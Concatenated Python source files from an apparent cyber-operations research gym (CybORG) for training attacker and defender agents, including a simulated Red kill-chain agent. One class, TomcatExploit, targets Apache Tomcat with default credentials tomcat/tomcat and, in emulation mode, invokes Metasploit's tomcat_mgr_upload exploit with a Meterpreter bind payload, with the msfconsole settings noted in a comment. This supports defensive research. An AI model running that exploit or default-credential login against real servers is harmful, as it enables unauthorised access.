## The following code contains work of the United States Government and is not subject to domestic copyright protection under 17 USC § 105.
## Additionally, we waive copyright and related rights in the utilized code worldwide through the CC0 1.0 Universal public domain dedication.

import sys
import yaml
import csle_cyborg.agents
from csle_cyborg.shared.scenario import Scenario
from csle_cyborg.shared.actions.action import Action, InvalidAction
from csle_cyborg.shared.results import Results
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.abstract_actions.monitor import Monitor
from csle_cyborg.shared.agent_interface import AgentInterface


class EnvironmentController:
    """The abstract base controller for all CybORG environment controllers.

    Provides the abstract methods which all CybORG controllers must implement. This includes setup and teardown,
    modifying the state, and pulling out data from the environment.
    When both Simulation and Emulation share common functionality, it is implemented here.


    Attributes
    ----------
    scenario_dict : dict
        the scenario data
    agent_interfaces : dict[str: AgentInterface]
        agent interface object for agents in scenario
    """

    def __init__(self, scenario_dict: dict, scenario_mod: dict = None, agents: dict = None):
        """Instantiates the Environment Controller.
        Parameters
        ----------
        scenario_path : str
            path to scenario YAML file
        agents : dict, optional
            map from agent name to agent interface of agents to be used in
            environment. If None agents will be loaded from description in
            scenario file (default=None)
        """
        self.hostname_ip_map = None
        self.subnet_cidr_map = None
        # self.scenario_dict = self._parse_scenario(scenario_path, scenario_mod=scenario_mod)
        self.scenario_dict = scenario_dict
        self.scenario = Scenario(self.scenario_dict)
        self._create_environment()
        self.agent_interfaces = self._create_agents(agents)
        self.reward = {}
        self.INFO_DICT = {}
        self.action = {}
        self.next_observation = {}
        self.done = False
        self.observation = {}
        self.actions = {"Red": [], "Blue": [], "Green": []}
        self.INFO_DICT['True'] = {}
        for host in self.scenario.hosts:
            self.INFO_DICT['True'][host] = {'System info': 'All', 'Sessions': 'All', 'Interfaces': 'All',
                                            'User info': 'All',
                                            'Processes': ['All']}
        self.init_state = self._filter_obs(self.get_true_state(self.INFO_DICT['True'])).data
        for agent in self.scenario.agents:
            self.INFO_DICT[agent] = self.scenario.get_agent_info(agent).osint.get('Hosts', {})
            for host in self.INFO_DICT[agent].keys():
                self.INFO_DICT[agent][host]['Sessions'] = agent
        # populate initial observations with OSINT
        for agent_name, agent in self.agent_interfaces.items():
            self.observation[agent_name] = self._filter_obs(self.get_true_state(self.INFO_DICT[agent_name]), agent_name)
            agent.set_init_obs(self.observation[agent_name].data, self.init_state)

    def reset(self, agent: str = None) -> Results:
        """Resets the environment and get initial agent observation and actions.

        Parameters
        ----------
        agent : str, optional
            the agent to get initial observation for, if None will return
            initial white state (default=None)

        Returns
        -------
        Results
            The initial observation and actions of a agent or white team
        """
        self.reward = {}
        self.actions = {"Red": [], "Blue": [], "Green": []}
        self.steps = 0
        self.done = False
        self.init_state = self._filter_obs(self.get_true_state(self.INFO_DICT['True'])).data
        for agent_name, agent_object in self.agent_interfaces.items():
            agent_object.reset()
            self.observation[agent_name] = self._filter_obs(self.get_true_state(self.INFO_DICT[agent_name]), agent_name)
            agent_object.set_init_obs(self.observation[agent_name].data, self.init_state)
        if agent is None:
            return Results(observation=self.init_state)
        else:
            return Results(observation=self.observation[agent].data,
                           action_space=self.agent_interfaces[agent].action_space.get_action_space())

    # def update_observation(self):
    #     for agent_name, agent_object in self.agent_interfaces.items():
    #         self.observation[agent_name] = self._filter_obs(self.get_true_state(self.INFO_DICT[agent_name]), agent_name)


    def step(self, agent: str = None, action: Action = None, skip_valid_action_check: bool = False) -> Results:
        """Perform a step in the environment for given agent.

        Parameters
        ----------
        agent : str, optional
            the agent to perform step for (default=None)
        action : Action/
            the action to perform

        Returns
        -------
        Results
            the result of agent performing the action
        """

        # for each agent:
        self.next_observation = {}
        # all agents act on the state
        for agent_name, agent_object in self.agent_interfaces.items():
            # pass observation to agent to get action
            if agent is None or action is None or agent != agent_name:
                agent_action = agent_object.get_action(self.observation[agent_name])

            else:
                agent_action = action
            if not self.test_valid_action(agent_action, agent_object) and not skip_valid_action_check:
                agent_action = InvalidAction(agent_action)
            self.action[agent_name] = agent_action
            self.actions[agent_name].append(agent_action)

            # perform action on state
            self.next_observation[agent_name] = self._filter_obs(self.execute_action(self.action[agent_name]), agent_name)

        # get true observation
        true_observation = self._filter_obs(self.get_true_state(self.INFO_DICT['True'])).data

        # Blue update step.
        # New idea: run the MONITOR action for the Blue agent, and update the observation.

        # pass training information to agents
        for agent_name, agent_object in self.agent_interfaces.items():

            # determine done signal for agent
            done = self.determine_done(self.next_observation, true_observation, self.action[agent_name])
            self.done = done or self.done
            # determine reward for agent
            reward = agent_object.determine_reward(self.next_observation, true_observation,
                                                   self.action, self.done)
            self.reward[agent_name] = reward + self.action[agent_name].cost
            if agent_name != agent:
                # train agent using obs, reward, previous observation, and done
                agent_object.train(Results(observation=self.observation[agent_name].data, reward=reward,
                                           next_observation=self.next_observation[agent_name].data, done=self.done))
            self.observation[agent_name] = self.next_observation[agent_name]
            agent_object.update(self.observation[agent_name])

            # if self.verbose and type(self.action[agent_name]) != Sleep and self.observation[agent_name].dict['success'] == True:
            #    print(f"Step: {self.steps}, {agent_name}'s Action Choice: {type(self.action[agent_name]).__name__}, "
            #          f"Reward: {reward}")

        # Update Blue's observation with the latest information before returning.
        for agent_name, agent_object in self.agent_interfaces.items():
            if agent_name == 'Blue':
                agent_session = list(self.get_action_space(agent_name)['session'].keys())[0]
                agent_observation = self._filter_obs(
                    self.execute_action(Monitor(session=agent_session, agent='Blue')), agent_name)
                first_action_success = self.observation[agent_name].success
                self.observation[agent_name].combine_obs(agent_observation)
                self.observation[agent_name].set_success(first_action_success)
                agent_object.update(self.observation[agent_name])
        # if done then complete other agent's turn

        if agent is None:
            result = Results(observation=true_observation, done=self.done)
        else:
            result = Results(observation=self.observation[agent].data, done=self.done,
                             reward=round(self.reward[agent], 1),
                             action_space=self.agent_interfaces[agent].action_space.get_action_space(),
                             action=self.action[agent])
        return result

    def execute_action(self, action: Action) -> Observation:
        """Execute an action in the environment"""
        raise NotImplementedError

    def determine_done(self,
                       agent_obs: dict,
                       true_obs: dict,
                       action: Action) -> bool:
        """Determine if environment scenario goal has been reached.

        Parameters
        ----------
        agent_obs : dict
            the agents last observation
        true_obs : dict
            the current white state
        action : Action
            the agents last action performed

        Returns
        -------
        bool
            whether goal was reached or not
        """
        return False

    def start(self, steps: int = None, log_file=None):
        """Start the environment and run for a specified number of steps.

        Parameters
        ----------
        steps : int
            the number of steps to run for
        log_file : File, optional
            a file to write results to (default=None)

        Returns
        -------
        bool
            whether goal was reached or not
        """
        done = False
        max_steps = 0
        if steps is None:
            while not done:
                max_steps += 1
                _, _, done = self.step()
            print('Red Wins!')  # Junk Test Code
        else:
            for step in range(steps):
                max_steps += 1
                results = self.step()
                done = results.done
                if step == 500:
                    print(step)  # Junk Test Code
                if done:
                    print(f'Red Wins at step {step}')  # Junk Test Code
                    break
        for agent_name, agent in self.agent_interfaces.items():
            agent.end_episode()
            # print(f"{agent_name}'s Reward: {self.reward[agent_name]}")
        if log_file is not None:
            log_file.write(
                f"{max_steps},{self.reward['Red']},{self.reward['Blue']},"
                f"{self.agent_interfaces['Red'].agent.epsilon},"
                f"{self.agent_interfaces['Red'].agent.gamma}\n"
            )
        return done

    def get_true_state(self, info: dict) -> Observation:
        """Get current True state

        Returns
        -------
        Observation
            current true state
        """
        raise NotImplementedError

    def get_agent_state(self, agent_name: str) -> Observation:
        return self.get_true_state(self.INFO_DICT[agent_name])

    def get_last_observation(self, agent: str) -> Observation:
        """Get the last observation for an agent

        Parameters
        ----------
        agent : str
            name of agent to get observation for

        Returns
        -------
        Observation
            agents last observation
        """
        return self.observation[agent]

    def get_action_space(self, agent: str) -> dict:
        """
        Gets the action space for a chosen agent
        agent: str
            agent selected
        """
        if agent in self.agent_interfaces:
            return self.agent_interfaces[agent].action_space.get_action_space()
        raise ValueError(f'Agent {agent} not in agent list {self.agent_interfaces.values()}')

    def get_observation_space(self, agent: str) -> dict:
        """
                Gets the observation space for a chosen agent
                agent: str
                    agent selected
                """
        if agent in self.agent_interfaces:
            return self.agent_interfaces[agent].get_observation_space()
        raise ValueError(f'Agent {agent} not in agent list {self.agent_interfaces.values()}')

    def get_last_action(self, agent: str) -> Action:
        """
                Gets the observation space for a chosen agent
                agent: str
                    agent selected
                """
        return self.action[agent] if agent in self.action else None

    def restore(self, filepath: str):
        """Restores the environment from file

        Parameters
        ----------
        filepath : str
            path to file to restore env from
        """
        raise NotImplementedError

    def save(self, filepath: str):
        """Saves the environment to file

        Parameters
        ----------
        filepath : str
            path to file to save env to
        """
        raise NotImplementedError

    def pause(self):
        """Pauses the environment"""
        pass

    def shutdown(self, teardown: bool = True) -> bool:
        """Shutdown environment, deleting/terminating resources
        as required

        Parameters
        ----------
        teardown : bool, optional
            if True environment resources will be terminated if applicable,
            otherwise resources will not be terminated (allowing them to be
            reused if desired) (default=True)

        Returns
        -------
        bool
            True if the environment was shutdown without issue
        """
        raise NotImplementedError

    def _parse_scenario(self, scenario_file_path: str, scenario_mod: dict = None):
        with open(scenario_file_path) as fIn:
            scenario_dict = yaml.load(fIn, Loader=yaml.FullLoader)
        return scenario_dict

    def _create_agents(self, agent_classes: dict = None) -> dict:
        agents = {}

        for agent_name in self.scenario.agents:
            agent_info = self.scenario.get_agent_info(agent_name)
            if agent_classes is not None and agent_name in agent_classes:
                agent_class = agent_classes[agent_name]
            else:
                agent_class = getattr(sys.modules['csle_cyborg.agents'], agent_info.agent_type)
            agents[agent_name] = AgentInterface(
                agent_class,
                agent_name,
                agent_info.actions,
                agent_info.reward_calculator_type,
                allowed_subnets=agent_info.allowed_subnets,
                wrappers=agent_info.wrappers,
                scenario=self.scenario
            )
        return agents

    def _create_environment(self):
        raise NotImplementedError

    def _filter_obs(self, obs: Observation, agent_name=None):
        """Filter obs to contain only hosts/subnets in scenario network """
        if agent_name is not None:
            subnets = [self.subnet_cidr_map[s] for s in self.scenario.get_agent_info(agent_name).allowed_subnets]
        else:
            subnets = list(self.subnet_cidr_map.values())

        obs.filter_addresses(
            ips=self.hostname_ip_map.values(),
            cidrs=subnets,
            include_localhost=False
        )
        return obs

    def test_valid_action(self, action: Action, agent: AgentInterface):
        # returns true if the parameters in the action are in and true in the action set else return false
        action_space = agent.action_space.get_action_space()
        # first check that the action class is allowed
        if type(action) not in action_space['action'] or not action_space['action'][type(action)]:
            return False
        # next for each parameter in the action
        for parameter_name, parameter_value in action.get_params().items():
            if parameter_name not in action_space:
                continue
            if parameter_value not in action_space[parameter_name] or not action_space[parameter_name][parameter_value]:
                return False
        return True

    def get_reward_breakdown(self, agent: str):
        return self.agent_interfaces[agent].reward_calculator.host_scores



# Copyright DST Group. Licensed under the MIT license.
from ipaddress import IPv4Address

# For use after TomcatCredentialScanner most likely
# use exploit/multi/http/tomcat_mgr_upload
# set RHOSTS target, set RPORT target_port, set HttpPassword password, set HttpUsername user, set target 0
from csle_cyborg.shared.actions.msf_actions_folder.remote_code_execution_folder.remote_code_execution import RemoteCodeExecution
from csle_cyborg.shared.enums import ProcessType, ProcessVersion, AppProtocol, SessionType
from csle_cyborg.shared.observation import Observation


class TomcatExploit(RemoteCodeExecution):
    def __init__(self, session: int, agent: str, ip_address: IPv4Address, port: int, username: str,
                 password: str):
        super().__init__(session, agent)
        self.target = ip_address
        self.target_port = port
        self.user = username
        self.password = password

    def sim_execute(self, state):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return obs
        from_host = state.sessions['Red'][self.session].host

        from_session = state.sessions['Red'][self.session]
        if from_session.session_type != SessionType.MSF_SERVER or not from_session.active:
            return obs

        from_session, from_interface = self.get_local_source_interface(local_session=from_session, remote_address=self.target)

        if from_interface is None:
            obs.set_success(False)
            return obs

        if self.target == IPv4Address("127.0.0.1"):
            target_host = from_host
        else:
            target_host = state.hosts[state.ip_addresses[self.target]]

        target_proc = None
        for process in target_host.processes:
            for conn in process.connections:
                if self.target_port == conn['local_port']:
                    if conn['local_address'] == IPv4Address("0.0.0.0") or (
                            conn['local_address'] == IPv4Address("127.0.0.1") and self.target == IPv4Address(
                            "127.0.0.1")) or conn['local_address'] == self.target:
                        target_proc = process
                    break

        if target_proc is None:
            obs.set_success(False)
            return obs
        else:
            if target_proc.process_type == ProcessType.WEBSERVER:
                if target_proc.version == ProcessVersion.APACHE_TOMCAT:
                    for conn in target_proc.connections:
                        if conn["local_port"] == self.target_port:
                            if conn['Application Protocol'] == AppProtocol.HTTP:
                                if self.user == "tomcat" and self.password == "tomcat":
                                    obs.set_success(True)
                                    obs.add_process(hostid="hostid1", local_address=self.target,
                                                    local_port=self.target_port,
                                                    status="open")
                                    obs.add_user_info(hostid="hostid1", username="tomcat", password="tomcat",
                                                      group_name="web server users")
                                    # TODO: add session that spawns from target_proc
                                    session = state.add_session(host=target_host.hostname, agent=self.agent,
                                                                user=target_proc.user.username,
                                                                session_type='Meterpreter', parent=from_session)
                                    port = target_host.get_ephemeral_port()
                                    session.process.user = session.user
                                    session.process.name = "java"
                                    session.process.path = "/usr/bin/"  # Should acutally be "/usr/lib/jvm/java-1.5.0-gcj-4.2-1.5.0.0/jre/bin/" ?
                                    session.process.ppid = 1
                                    new_connection = {
                                        'local_port': port,
                                        'local_address': self.target,
                                        'remote_port': 4444,
                                        'remote_address': from_interface.ip_address,
                                        'Application Protocol': "tcp"
                                    }
                                    session.process.connections.append(new_connection)

                                    remote_port = {
                                        'local_port': 4444,
                                        "Application Protocol": "tcp",
                                        "local_address": from_interface.ip_address,
                                        "remote_address": self.target,
                                        "remote_port": port
                                    }
                                    from_session.process.connections.append(remote_port)

                                    obs.add_session_info(hostid='hostid1', timeout=0, session_id=session.ident,
                                                         session_type=session.session_type, agent=self.agent)
                                    obs.add_process(hostid='hostid1', local_address=self.target,
                                                    remote_address=from_interface.ip_address, remote_port=4444,
                                                    local_port=port)
                                    obs.add_process(hostid='hostid0', local_address=from_interface.ip_address,
                                                    remote_address=self.target, local_port=4444, remote_port=port)
        return obs

    def emu_execute(self, session_handler) -> Observation:
        obs = Observation()
        from csle_cyborg.CybORG import MSFSessionHandler
        if type(session_handler) is not MSFSessionHandler:
            obs.set_success(False)
            return obs
        output = session_handler.execute_exploit(exploit_name='multi/http/tomcat_mgr_upload', payload='java/meterpreter/bind_tcp',
                                         opts={'RHOSTS': str(self.target), "RPORT": self.target_port, "HttpPassword": self.password, "HttpUsername": self.user})
        obs.add_raw_obs(output)
        obs.set_success(False)
        return obs


# Copyright DST Group. Licensed under the MIT license.

from csle_cyborg.shared.actions.game_actions.game_action import GameAction


class GameEcho(GameAction):

    def __init__(self, echo_cmd: str):
        super().__init__()
        self.cmd = echo_cmd



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.msf_actions_folder.meterpreter_actions_folder.meterpreter_action import MeterpreterAction
from csle_cyborg.simulator.session import SessionType
from csle_cyborg.shared.observation import Observation
from csle_cyborg.simulator.state import State


# Call localtime from a meterpreter session - gives the current local time of the dict
class LocalTime(MeterpreterAction):
    def __init__(self, session: int, agent: str):
        super().__init__(session=session, agent=agent)

    def sim_execute(self, state: State):
        obs = Observation()
        obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return obs
        session = state.sessions[self.agent][self.session]

        if session.session_type != SessionType.METERPRETER or not session.active:
            return obs

        obs.set_success(True)
        obs.add_system_info(local_time=session.host.time)
        return obs



# Copyright DST Group. Licensed under the MIT license.

from csle_cyborg.shared.observation import Observation

from .shell_action import ShellAction


class ShellEcho(ShellAction):

    def __init__(self,
                 session: int = None,
                 agent: str = None,
                 echo_cmd: str = "Testing",
                 **kwargs):
        super().__init__(session, agent)
        self.cmd = echo_cmd

    def sim_execute(self, state):
        return Observation()

    def emu_execute(self, session_handler, *args, **kwargs):
        cmd = f"echo {self.cmd}"
        output = session_handler.execute(cmd)
        obs = Observation()
        obs.set_success(True)
        obs.add_raw_obs(output)
        return obs



# Copyright DST Group. Licensed under the MIT license.
import random
from typing import Any
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.results import Results
from csle_cyborg.shared.logger import CybORGLogger
from csle_cyborg.shared.environment_controller import EnvironmentController
from csle_cyborg.simulator.simulation_controller import SimulationController


class Main(CybORGLogger):
    """The main interface for the Cyber Operations Research Gym.

    The primary purpose of this class is to provide a unified interface for the CybORG simulation and emulation
    environments. The user chooses which of these modes to run when instantiating the class and CybORG initialises
    the appropriate environment controller.

    This class also provides the external facing API for reinforcement learning agents, before passing these commands
    to the environment controller. The API is intended to closely resemble that of OpenAI Gym.

    Attributes
    ----------
    scenario_file : str
        Path for valid scenario YAML file.
    environment : str, optional
        The environment to use. CybORG currently supports 'sim'
        and 'aws' modes (default='sim').
    env_config : dict, optional
        Configuration keyword arguments for environment controller
        (See relevant Controller class for details), (default=None).
    agents : dict, optional
        Map from agent name to agent interface for all agents to be used internally.
        If None agents will be loaded from description in scenario file (default=None).
    """
    supported_envs = ['sim']

    def __init__(self,
                 scenario_file: str,
                 environment: str = "sim",
                 env_config=None,
                 agents: dict = None):
        """Instantiates the CybORG class.

        Parameters
        ----------
        scenario_file : str
            Path for valid scenario YAML file.
        environment : str, optional
            The environment to use. CybORG currently supports 'sim'
            and 'aws' modes (default='sim').
        env_config : dict, optional
            Configuration keyword arguments for environment controller
            (See relevant Controller class for details), (default=None).
        agents : dict, optional
            Map from agent name to agent interface for all agents to be used internally.
            If None agents will be loaded from description in scenario file (default=None).
        """
        self.env = environment
        self.scenario_file = scenario_file
        self._log_info(f"Using scenario file {scenario_file}")
        self.environment_controller = self._create_env_controller(
            env_config, agents
        )

    def _create_env_controller(self,
                               env_config,
                               agents) -> EnvironmentController:
        """Chooses which Environment Controller to use then instantiates it.

        Parameters
        ----------
        """
        if self.env == 'sim':
            return SimulationController(self.scenario_file, agents=agents)
        raise NotImplementedError(
            f"Unsupported environment '{self.env}'. Currently supported "
            f"environments are: {self.supported_envs}")

    def step(self, agent: str = None, action=None, skip_valid_action_check: bool = False) -> Results:
        """Performs a step in CybORG for the given agent.

        Parameters
        ----------
        agent : str, optional
            the agent to perform step for (default=None)
        action : Action
            the action to perform
        skip_valid_action_check : bool
            a flag to diable the valid action check
        Returns
        -------
        Results
            the result of agent performing the action
        """
        return self.environment_controller.step(agent, action, skip_valid_action_check)

    def start(self, steps: int, log_file=None) -> bool:
        """Start CybORG and run for a specified number of steps.

        Parameters
        ----------
        steps : int
            the number of steps to run for
        log_file : File, optional
            a file to write results to (default=None)

        Returns
        -------
        bool
            whether goal was reached or not
        """
        return self.environment_controller.start(steps, log_file)

    def get_true_state(self, info: dict) -> dict:
        """
        Query the current state.

        Parameters
        ----------
        info : dict
            Dictionary con

        Returns
        -------
        Results
            The information requested.
        """
        return self.environment_controller.get_true_state(info).data

    def get_agent_state(self, agent_name) -> dict:
        """
        Get the initial observation of the specified agent.

        Parameters
        ----------
        agent : str
            The agent to get the initial observation for.
            Set as 'True' to get the true-state.

        Returns
        -------
        dict
            The initial observation of the specified agent.
        """
        return self.environment_controller.get_agent_state(agent_name).data

    def reset(self, agent: str = None) -> Results:
        """
        Resets CybORG and gets initial observation and action-space for the specified agent.

        Note
        ----
        This method is a critical part of the OpenAI Gym API.

        Parameters
        ----------
        agent : str, optional
            The agent to get the initial observation for.
            If None will return the initial true-state (default=None).

        Returns
        -------
        Results
            The initial observation and actions of an agent.
        """
        return self.environment_controller.reset(agent=agent)

    def shutdown(self, **kwargs) -> bool:
        """
        Shuts down the CybORG environment.

        Parameters
        ----------
        **kwargs : dict, optional
            Keyword arguments to pass to the environment controller shutdown
            function. See the shutdown function of the specific environment
            controller used for details.

        Returns
        -------
        bool
            True if cyborg was shutdown without any issues.
        """
        self.environment_controller.shutdown(**kwargs)

    def pause(self):
        """Pauses the environment."""
        self.environment_controller.pause()

    def save(self, filepath: str):
        """
        Saves the CybORG environment to a file.

        Note
        ----
        Not currently supported for all environments.

        Parameters
        ----------
        filepath : str
            Path to file to save environment to.
        """
        self.environment_controller.save(filepath)

    def restore(self, filepath: str):
        """
        Restores the CybORG environment from a file.

        Note
        ----
        Not currently supported for all environments.

        Parameters
        ----------
        filepath : str
            Path to file to restore environment from.
        """
        self.environment_controller.restore(filepath)

    def get_observation(self, agent: str) -> dict:
        """
        Get the last observation for an agent.

        Parameters
        ----------
        agent : str
            Name of the agent to get observation for.

        Returns
        -------
        Observation
            The agent's last observation.
        """
        return self.environment_controller.get_last_observation(agent).data

    def get_action_space(self, agent: str):
        """
        Returns the most recent action space for the specified agent.

        Action spaces may change dynamically as the scenario progresses.

        Parameters
        ----------
        agent : str
            Name of the agent to get action space for.

        Returns
        -------
        dict
            The action space of the specified agent.

        """
        return self.environment_controller.get_action_space(agent)

    def get_observation_space(self, agent: str):
        """
        Returns the most recent observation for the specified agent.

        Parameters
        ----------
        agent : str
            Name of the agent to get observation space for.

        Returns
        -------
        dict
            The observation of the specified agent.

        """
        return self.environment_controller.get_observation_space(agent)

    def get_last_action(self, agent: str):
        """
        Returns the last executed action for the specified agent.

        Parameters
        ----------
        agent : str
            Name of the agent to get last action for.

        Returns
        -------
        Action
            The last action of the specified agent.

        """
        return self.environment_controller.get_last_action(agent)

    def set_seed(self, seed: int):
        """
        Sets a random seed.

        Parameters
        ----------
        seed : int
        """
        random.seed(seed)

    def get_ip_map(self):
        """
        Returns a mapping of hostnames to ip addresses for the current scenario.

        Returns
        -------
        dict
            The ip_map indexed by hostname.

        """
        return self.environment_controller.hostname_ip_map

    def get_rewards(self):
        """
        Returns the rewards for each agent at the last executed step.

        Returns
        -------
        dict
            The rewards indexed by agent name.

        """
        return self.environment_controller.reward

    def get_reward_breakdown(self, agent: str):
        # TODO: Docstring
        return self.environment_controller.get_reward_breakdown(agent)

    def get_attr(self, attribute: str) -> Any:
        """
        Returns the specified attribute if present. 

        Intended to give wrappers access to the base CybORG class.

        Parameters
        ----------
        attribute : str
            Name of the requested attribute.

        Returns
        -------
        Any
            The requested attribute.
        """
        if hasattr(self, attribute):
            return self.__getattribute__(attribute)
        else:
            return None



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.game_actions.game_action import GameAction


class ListAllSessions(GameAction):
    """Get session info for all active sessions for all agents for a game.
    """

    def emu_execute(self, game_controller, *args, **kwargs) -> Observation:
        obs = Observation()
        for agent in game_controller.list_agents():
            agent_controller = game_controller.get_agent(agent)
            for session in agent_controller.list_sessions():
                session_controller = agent_controller.get_session(session)
                obs.add_session_info(
                    agent=agent,
                    **session_controller.get_info()
                )
        obs.set_success(True)
        return obs



import random
from csle_cyborg.shared.actions.abstract_actions.discover_remote_systems import DiscoverRemoteSystems
from csle_cyborg.shared.actions.abstract_actions.discover_network_services import DiscoverNetworkServices
from csle_cyborg.shared.actions.abstract_actions.exploit_remote_service import ExploitRemoteService
from csle_cyborg.shared.actions.abstract_actions.privilege_escalate import PrivilegeEscalate
from csle_cyborg.shared.actions.abstract_actions.impact import Impact


class HeuristicRed():
    def __init__(self, session=0, priority=None):
        self.priority = priority
        self.parameters = {
            'session': session,
            'agent': 'Red',
        }

        self.killchain = [DiscoverNetworkServices, ExploitRemoteService,
                          PrivilegeEscalate, Impact]

        self.last_action = None
        self.history = []
        self.active_ip = None

        self.known_subnets = set()
        self.unexplored_subnets = set()
        self.ip_map = {}
        self.ip_status = {}

    def get_action(self, obs):
        success = obs['success']
        if success == False:
            # Needs to be failure first because unknown (initial obs) counts as true
            self._process_last_action_failure()
        else:
            self._process_last_action_success() if self.last_action else None
            self._process_new_ips(obs)

        action = self._advance_killchain()

        return action

    def _process_last_action_success(self):
        action = self.last_action
        name = self.last_action.__class__.__name__
        if name == 'DiscoverRemoteSystems':
            subnet = action.subnet
            self.unexplored_subnets.remove(subnet)
        elif name in ('DiscoverNetworkServices', 'ExploitRemoteService'):
            # Advance killchain
            ip = action.ip_address
            self.ip_status[ip] += 1
        else:
            # Get ip from hostname and advance killchain
            ip = self._get_ip(action.hostname)
            self.ip_status[ip] += 1 if self.ip_status[ip] < 3 else 0

    def _process_last_action_failure(self):
        action = self.last_action
        name = self.last_action.__class__.__name__
        if name in ('PrivilegeEscalate', 'Impact'):
            ip = self._get_ip(action.hostname)
            self.ip_status[ip] = 1
        elif name == 'ExploitRemoteService':
            # Assuming host is Defender
            self.ip_status[action.ip_address] = 3
        else:
            raise NotImplementedError('Scans are not supposed to fail.')

    def _process_new_ips(self, obs):
        for hostid in obs:
            if hostid == 'success':
                continue
            host = obs[hostid]
            for interface in host.get('Interface', []):
                subnet = interface.get('Subnet')
                if (subnet not in self.known_subnets) and (subnet is not None):
                    self.known_subnets.add(subnet)
                    self.unexplored_subnets.add(subnet)

                ip = interface.get('IP Address')
                assert ip is not None
                if ip not in self.ip_status:
                    self.ip_status[ip] = 0

                sysinfo = host.get('System info')
                hostname = sysinfo.get('Hostname') if sysinfo else None

                if ip not in self.ip_map:
                    self.ip_map[ip] = hostname
                elif self.ip_map[ip] is None:
                    self.ip_map[ip] = hostname

    def _advance_killchain(self):
        if self.unexplored_subnets:
            subnet = random.choice(list(self.unexplored_subnets))
            action = DiscoverRemoteSystems(subnet=subnet, **self.parameters)
        else:

            ip = self._choose_ip()

            action = self._choose_exploit(ip)
            if ip not in self.ip_status:
                self.ip_status[ip] = 0

        self.last_action = action
        self.history.append(action)
        return action

    def _choose_ip(self):
        if self.active_ip is None:
            self.active_ip = random.choice(list(self.ip_status.keys()))

        ip = self.active_ip
        status = self.ip_status[ip]
        if (status < 3) or (self.ip_map[ip] == 'Op_Server0'):
            pass
        else:
            valid_ips = [ip for ip in self.ip_status if self.ip_status[ip] < 3]
            ip = self.active_ip = random.choice(valid_ips) if valid_ips else None

        self.active_ip = ip
        assert ip in self.ip_status
        return ip

    def _choose_exploit(self, ip):
        status = self.ip_status[ip]
        command = self.killchain[status]
        if status == 0:
            action = command(ip_address=ip, **self.parameters)
        elif status == 1:
            action = command(ip_address=ip, priority=self.priority, **self.parameters)
        else:
            hostname = self.ip_map[ip]
            action = command(hostname=hostname, **self.parameters)

        return action

    def _get_ip(self, hostname):
        for ip in self.ip_map:
            if self.ip_map[ip] == hostname:
                break
        else:
            raise NotImplementedError('Hostname missing from ip_map')
        return ip



# TODO: create a scenario parser to check scenarios are valid
import yaml


def parse_scenario_file(scenario_file):
    print(f'Parsing {scenario_file}')
    with open(scenario_file) as fIn:
        loaded_scenario = yaml.load(fIn, Loader=yaml.FullLoader)
    parse_scenario(loaded_scenario)


def parse_scenario(scenario):
    # parse hosts in scenario
    count = 0
    assert 'Hosts' in scenario
    for host in scenario['Hosts'].values():
        parse_host(host)
        count += 1
    print(f'Parsed {count} hosts in scenario')
    host_list = list(scenario['Hosts'].keys())

    # parse subnets in scenario
    count = 0
    assert 'Subnets' in scenario
    subnet_list = list(scenario['Subnets'].keys())
    for subnet in scenario['Subnets'].values():
        parse_subnet(subnet, host_list, subnet_list)
        count += 1
    print(f'Parsed {count} subnets in scenario')

    # parse agents in scenario
    count = 0
    assert 'Agents' in scenario
    for agent in scenario['Agents'].values():
        parse_agent(agent, host_list, subnet_list)
        count += 1
    print(f'Parsed {count} agents in scenario')




def parse_agent(agent, hostlist, subnetlist):
    assert 'AllowedSubnets' in agent
    for subnet in agent['AllowedSubnets']:
        assert subnet in subnetlist, f'subnet {subnet} not in subnet list'
    assert 'INT' in agent
    if 'Hosts' in agent['INT']:
        for host, intelligence in agent['INT']['Hosts'].items():
            assert host in hostlist, f'host {host} in INT not in host list'
    assert 'actions' in agent
    assert 'agent_type' in agent
    assert 'reward_calculator_type' in agent
    assert 'starting_sessions' in agent
    for session in agent['starting_sessions']:
        assert session['hostname'] in hostlist, f'hostname {session["hostname"]} for session {session["name"]} not in hostlist'
    assert 'wrappers' in agent


def parse_host(host):
    assert 'image' in host


def parse_subnet(subnet, host_list, subnet_list):
    assert 'Hosts' in subnet
    for host in subnet['Hosts']:
        assert host in host_list
    assert 'NACLs' in subnet
    for name, rule in subnet['NACLs'].items():
        if name != 'all':
            assert name in subnet_list
    assert 'Size' in subnet

if __name__ == "__main__":
    for scenario in ["Scenario1.yaml", "Scenario1b.yaml"]:
        parse_scenario_file(scenario)



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.actions.action import Action
from csle_cyborg.shared.observation import Observation


class ActionHandler:
    def __init__(self):
        pass

    def perform(self, action: Action) -> Observation:
        raise NotImplementedError



# Copyright DST Group. Licensed under the MIT license.

import pprint
from copy import deepcopy
from csle_cyborg.shared.observation import Observation


class Results:

    def __init__(self,
                 observation: dict = None,
                 done: bool = None,
                 reward: float = None,
                 info=None,
                 parameter_mask=None,
                 action_space=None,
                 error: Exception = None,
                 error_msg: str = None,
                 next_observation=None,
                 action=None,
                 action_name: str = None):
        self.observation = observation
        self.next_observation = next_observation
        self.done = done
        self.reward = reward
        self.action = action
        self.info = info
        self.parameter_mask = parameter_mask
        self.action_space = action_space
        self.error = error
        self.error_msg = error_msg
        self.action_name = action_name
        self.selection_masks = None

    def has_error(self):
        return self.error is not None

    def copy(self):
        copy_kwargs = {
            "done": self.done,
            "reward": self.reward,
            "error": deepcopy(self.error),
            "error_msg": deepcopy(self.error_msg),
            "action": deepcopy(self.action),
            "info": deepcopy(self.info),
            "action_space": deepcopy(self.action_space)
        }

        if isinstance(self.observation, Observation):
            copy_kwargs["observation"] = self.observation.copy()
        else:
            copy_kwargs["observation"] = deepcopy(self.observation)

        if isinstance(self.next_observation, Observation):
            copy_kwargs["next_observation"] = self.next_observation.copy()
        else:
            copy_kwargs["next_observation"] = deepcopy(self.next_observation)

        return Results(**copy_kwargs)

    def __str__(self):
        output = [f"{self.__class__.__name__}:"]
        for attr, v in self.__dict__.items():
            if v is None:
                continue
            if isinstance(v, dict):
                v_str = pprint.pformat(v)
            else:
                v_str = str(v)
